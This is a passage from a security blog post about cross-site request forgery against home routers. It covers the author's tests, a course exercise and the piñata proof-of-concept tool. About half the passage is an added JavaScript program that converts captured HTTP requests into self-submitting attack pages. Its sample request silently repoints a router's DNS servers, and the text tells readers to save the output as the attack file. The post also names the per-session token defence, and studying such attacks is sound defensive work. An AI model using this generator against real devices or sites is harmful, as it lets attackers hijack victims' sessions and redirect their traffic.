Sounds interesting, right? So what can you do with CSRF? The options are many, and they depend on the vulnerable Web application. For example, I grabbed two wireless routers I had sitting in my office. One was from Netgear and the other from Linksys. A quick test showed both were vulnerable to CSRF, and I could create a Web page that would log me out of both just by opening the page in my browser while logged in; the browser attaches the router's session cookie to the forged request on its own, which is what makes the attack work. Not particularly exciting, but it gets worse.
In the SANS SEC 560 course, there is an exercise where the students demonstrate CSRF attacks against a fictitious banking site. The attack allows the students to transfer money from victims' accounts into their own. Closer to the router CSRF attack above, researchers have published several proofs of concept showing how a consumer router's configuration could be changed to point at malicious DNS servers, redirecting legitimate traffic to the attacker's servers.
A new tool for creating proof-of-concept CSRF attacks was released recently called piñata. It is written in Python and designed to take an HTTP request for the vulnerable Web page and turn it into an HTML file containing the CSRF attack. It works for both GET and POST requests. I tested the tool with several requests against my vulnerable wireless routers by first grabbing the HTTP request via Paros proxy.
The first several test runs threw errors that required me to clean up the requests. It seems piñata was having trouble parsing the User-Agent string in my requests. Once I trimmed it to one value, piñata created the appropriate CSRF attack file. I had similar problems with both GETs and POSTs, but was able to get them to work eventually.
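As an added example (not piñata's code, and not from the original post), here is a minimal generator in JavaScript that does what the tool is described as doing: it takes a raw HTTP request, as captured in an intercepting proxy such as Paros, and emits an HTML page with a hidden form that submits itself on load, for either a GET or a POST. The router host `router.example`, the `/apply.cgi` path and the DNS parameters in the sample request are constructed for illustration. The parser reads only the request line, the Host header and the body, so a long User-Agent value is carried through untouched and cannot break the parse, and it HTML-escapes every captured parameter so a quote in the request cannot break out of the generated form.

```javascript
// Added example: a piñata-style CSRF proof-of-concept generator.
// Input is a raw HTTP request as copied out of a proxy; output is an
// HTML page whose hidden form replays that request from the victim's
// browser. All hostnames, paths and parameters below are constructed.

// Escape a value for use inside an HTML attribute so captured data
// cannot terminate the attribute or inject markup into the PoC page.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Split a raw request into request line, headers and body. Headers end
// at the first blank line; everything after it is the body. Header
// values are stored verbatim, so a complex User-Agent is harmless here.
function parseRequest(raw) {
  const text = raw.replace(/\r\n/g, "\n");
  const sep = text.indexOf("\n\n");
  const head = sep === -1 ? text : text.slice(0, sep);
  const body = sep === -1 ? "" : text.slice(sep + 2);
  const lines = head.split("\n");
  const [method, target] = lines[0].trim().split(/\s+/);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) {
      headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
    }
  }
  return { method: method.toUpperCase(), target, headers, body: body.trim() };
}

// Decode a query string or urlencoded POST body into [name, value] pairs.
function parseParams(qs) {
  if (!qs) return [];
  return qs.split("&").filter(Boolean).map((pair) => {
    const i = pair.indexOf("=");
    const name = i === -1 ? pair : pair.slice(0, i);
    const value = i === -1 ? "" : pair.slice(i + 1);
    return [
      decodeURIComponent(name.replace(/\+/g, " ")),
      decodeURIComponent(value.replace(/\+/g, " ")),
    ];
  });
}

// Build the PoC page. For GET the query string becomes the hidden
// fields; for POST the body does. The form is submitted by script as
// soon as the page loads, so the victim only has to open it.
function buildCsrfPage(raw, scheme = "http") {
  const req = parseRequest(raw);
  if (req.method !== "GET" && req.method !== "POST") {
    throw new Error("only GET and POST requests are supported");
  }
  const q = req.target.indexOf("?");
  const path = q === -1 ? req.target : req.target.slice(0, q);
  const query = q === -1 ? "" : req.target.slice(q + 1);
  const action = `${scheme}://${req.headers.host}${path}`;
  const params = req.method === "GET" ? parseParams(query) : parseParams(req.body);
  const inputs = params
    .map(([n, v]) => `    <input type="hidden" name="${escapeHtml(n)}" value="${escapeHtml(v)}">`)
    .join("\n");
  return [
    "<html><body>",
    `  <form id="csrf" method="${req.method}" action="${escapeHtml(action)}">`,
    inputs,
    "  </form>",
    "  <script>document.getElementById('csrf').submit();</script>",
    "</body></html>",
  ].join("\n");
}

// Constructed sample: a POST that repoints a fictional router's DNS
// servers, with the kind of multi-part User-Agent that tripped piñata.
const SAMPLE_POST = [
  "POST /apply.cgi HTTP/1.1",
  "Host: router.example",
  "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko/20080101 Firefox/3.0",
  "Content-Type: application/x-www-form-urlencoded",
  "Content-Length: 44",
  "",
  "dns1=203.0.113.5&dns2=203.0.113.6&save=Apply",
].join("\r\n");

console.log(buildCsrfPage(SAMPLE_POST));
```

Run it with `node` and save the printed page as the attack file. It only succeeds when the victim's browser still sends the router's session cookie to the target and the target accepts the cross-site form submission as-is; an application that ties each state-changing request to an unpredictable per-session token, which is the standard fix, will reject the replayed form.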
John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John's not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.